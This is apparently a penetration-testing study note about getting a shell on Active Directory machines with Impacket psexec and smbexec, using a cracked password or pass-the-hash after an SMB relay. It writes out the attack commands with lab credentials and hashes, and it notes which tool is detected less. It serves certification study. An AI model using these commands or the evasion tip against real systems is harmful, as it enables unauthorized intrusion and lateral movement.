// notes/ Active Directory
🏛️
Initial Attack Strategy Shell Acess
If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine. 
#active directory#adot8
source · oscp.adot8.com · active-directory/initial-attack-strategy_shell-acess ↗Shell Acess
Gaining Shell Access Overview
If we're able to dump the SAM in the SMB Relay attack then we can use those hashes to pop a shell on a machine.
We can use the actual password of the user if we cracked it or we can pass the hash instead.
Impacket-psexec
sh
$impacket-psexec PNPT/pparker:'Password2'@192.168.1.128$ $impacket-psexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f{% hint style="info" %} Impacket-wmiexec and Impacket-smbexec are also options that work the same way.
Impacket-smbexec gets picked up much less than the others
bash
$impacket-smbexec administrator@192.168.1.128 -hashes aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f{% endhint %}